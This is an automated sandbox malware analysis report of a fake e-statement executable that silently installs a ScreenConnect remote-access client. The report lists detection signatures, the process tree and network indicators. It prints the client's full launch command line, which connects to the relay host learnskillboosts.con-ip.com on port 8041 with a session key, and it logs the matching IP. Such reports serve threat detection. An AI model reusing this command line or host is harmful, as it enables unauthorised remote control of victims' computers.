Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
estatement020134230003.exe.virus.exe

Overview

General Information

Sample name:estatement020134230003.exe.virus.exe
Analysis ID:1569510
MD5:3cc83797cf15bc705fa0b723f03fa5d4
SHA1:38773bb12d9223506573fd5e8eaf9d545b30573c
SHA256:c4e648e5d4284160fbe55ebafcb6f7bf1236f153d5ce0660cdb45568e1287f2f
Tags:connectwiseexetrojanuser-ninjacatcher
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • estatement020134230003.exe.virus.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\estatement020134230003.exe.virus.exe" MD5: 3CC83797CF15BC705FA0B723F03FA5D4)
    • msiexec.exe (PID: 7624 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7656 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9422C348B364C7554592E19E8B2A0DAC C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7772 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI76AF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5732625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7848 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 033BA5D71B7F944453A970924D39DAE7 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7896 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 866783798F001865CAC127B6D020676D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7932 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 8000 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "8a895d2b-ac11-46ab-97d1-949397ce5283" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 7316 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "bff281c5-2f25-4369-bbf2-587ffb428846" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 8104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
estatement020134230003.exe.virus.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\~DF2437BA2833AB9893.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF19F1C74538568FA2.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF4F6677D5CBA456DC.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DFBF7D55DE1B9E3016.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000002.1739173914.0000000005270000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000008.00000002.3571728405.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 4 entries
                        SourceRuleDescriptionAuthorStrings
                        0.2.estatement020134230003.exe.virus.exe.5270000.11.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          8.2.ScreenConnect.WindowsClient.exe.31cfa10.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            8.0.ScreenConnect.WindowsClient.exe.d30000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.0.estatement020134230003.exe.virus.exe.1095db0.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                0.2.estatement020134230003.exe.virus.exe.5270000.11.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 4 entries

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", ProcessId: 7932, ProcessName: ScreenConnect.ClientService.exe
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8104, ProcessName: svchost.exe
                                  No Suricata rule has matched

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: estatement020134230003.exe.virus.exeReversingLabs: Detection: 18%
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.4% probability
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_04661738 CryptProtectData,7_2_04661738
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_04661730 CryptProtectData,7_2_04661730
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_063A30DC CryptUnprotectData,7_2_063A30DC
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_063A4250 CryptUnprotectData,7_2_063A4250
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_063A30D1 CryptUnprotectData,7_2_063A30D1
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeEXE: msiexec.exeJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: certificate valid
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3571728405.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831721302.00000000018A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830979750.00000000017E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1751313920.00000000002FD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1731279979.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: estatement020134230003.exe.virus.exe, 577f6a.msi.2.dr, MSI8342.tmp.2.dr, 577f6c.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI8362.tmp.2.dr, MSI8567.tmp.2.dr, 577f6b.rbs.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: estatement020134230003.exe.virus.exe, 577f6a.msi.2.dr, 577f6c.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI76AF.tmp.1.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831214463.0000000001842000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831214463.0000000001842000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 195.250.25.144:8041
                                  Source: Joe Sandbox ViewASN Name: OPTIMITYGB OPTIMITYGB
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: learnskillboosts.con-ip.com
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 00000009.00000002.3446658383.000001470E064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, estatement020134230003.exe.virus.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DEA8000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: edb.log.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                  Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DEA8000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: svchost.exe, 00000009.00000003.1792401984.000001470DEA8000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
